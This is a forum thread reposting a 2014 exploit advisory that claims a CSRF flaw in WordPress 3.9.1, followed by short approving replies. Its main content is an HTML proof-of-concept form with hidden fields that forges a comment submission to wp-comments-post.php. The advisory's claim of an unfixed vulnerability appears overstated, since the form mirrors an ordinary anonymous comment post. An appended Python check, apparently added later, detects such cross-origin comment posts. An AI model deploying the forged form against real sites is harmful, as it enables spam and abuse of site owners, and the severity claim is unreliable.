Wordpress 3.9.1 - CSRF Vulnerability
#1
Full title: Wordpress 3.9.1 - CSRF Vulnerability
Date add: 2014-06-22
Category: web applications
Platform: php



PHP Code:
# EXPLOIT TITLE: Wordpress 3.9.1 - CSRF vulnerability
# DATE: 21st June, 2014
# Author: Avinash Kumar Thapa
# URL: localhost/wordpress/
# PATCH/FIX: Not fixed yet.
  
###################################################################################################
  
Technical Details:
  
This is the new version released by Wordpress.
  
version is 3.9.1(Latest)
  
##Cross site request Forgery(CSRF) is present in this version at the url shown:http://localhost/wordpress/wp-comments-post.php##
  
#####################################################################################################
  
Exploit Code:
  
<html>
  <!-- CSRF PoC generated by **Avinash Kumar Thapa** -->
  <body>
    <form action="http://localhost/wordpress/wp-comments-post.php" method="POST">
      <input type="hidden" name="author" value="Anonymous" />
      <input type="hidden" name="email" value="helloworld@outlook.com" />
      <input type="hidden" name="url" value="www.random.com" />
      <input type="hidden" name="comment" value="Cross site request Forgery(CSRF)" />
      <input type="hidden" name="submit" value="Post Comment" />
      <input type="hidden" name="comment_post_ID" value="1" />
      <input type="hidden" name="comment_parent" value="0" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>
 
###########################################################################################################
----
--
Avinash a.k.a **SPID3R**

twitter: @m_avinash143 <https://twitter.com/m_avinash143>
 
# 2176756D962A5753   1337day.com [2014-06-23]   3C403FE073E403FD # 
People don't change; the only things that change are circumstances and interests...
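A defender-side view of the request the PoC above sends, as an added example that is not part of the original post or of WordPress: a framework-neutral Python check that flags POSTs to the comment endpoint whose Origin or Referer does not match the site. The function names, the strict handling of missing headers, the sample requests and the `other-site.example` host are assumptions constructed for illustration.

```python
from urllib.parse import urlsplit

# Path taken from the PoC form action on this page; everything else is assumed.
COMMENT_ENDPOINT = "/wordpress/wp-comments-post.php"
DEFAULT_PORTS = {"http": 80, "https": 443}


def origin_of(url):
    """Return (scheme, host, port) for an http(s) URL, or None if unusable."""
    parts = urlsplit(url)
    if parts.scheme not in DEFAULT_PORTS or not parts.hostname:
        return None
    try:
        port = parts.port or DEFAULT_PORTS[parts.scheme]
    except ValueError:  # malformed port in the header value
        return None
    return (parts.scheme, parts.hostname, port)


def is_forged_comment_post(method, path, headers, site_url):
    """True when a comment POST cannot be shown to come from site_url."""
    if method.upper() != "POST" or path != COMMENT_ENDPOINT:
        return False  # only the comment endpoint is in scope here
    hdrs = {k.lower(): v for k, v in headers.items()}
    # Prefer Origin, fall back to Referer. A missing or "null" value is
    # treated as unverifiable and rejected (strict policy, an assumption).
    source = hdrs.get("origin") or hdrs.get("referer")
    if not source:
        return True
    site = origin_of(site_url)
    return site is None or origin_of(source) != site


# Constructed sample requests: (method, path, headers).
SITE = "http://localhost/wordpress/"
SAMPLES = [
    ("POST", COMMENT_ENDPOINT, {"Origin": "http://localhost"}),
    ("POST", COMMENT_ENDPOINT, {"Referer": "http://localhost:80/wordpress/?p=1"}),
    ("POST", COMMENT_ENDPOINT, {"Origin": "http://other-site.example"}),
    ("POST", COMMENT_ENDPOINT, {"Origin": "null"}),
    ("POST", COMMENT_ENDPOINT, {}),
    ("GET", "/wordpress/", {}),
]


def classify(samples=SAMPLES, site=SITE):
    """Return one forged/not-forged verdict per sample request."""
    return [is_forged_comment_post(m, p, h, site) for m, p, h in samples]
```

The same comparison can be run over proxy or web-server logs that record the Origin and Referer headers, to find comment submissions that did not start on the site's own pages.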
#2
Nice work, chief
#3
Nice work
#4
Nice work, chief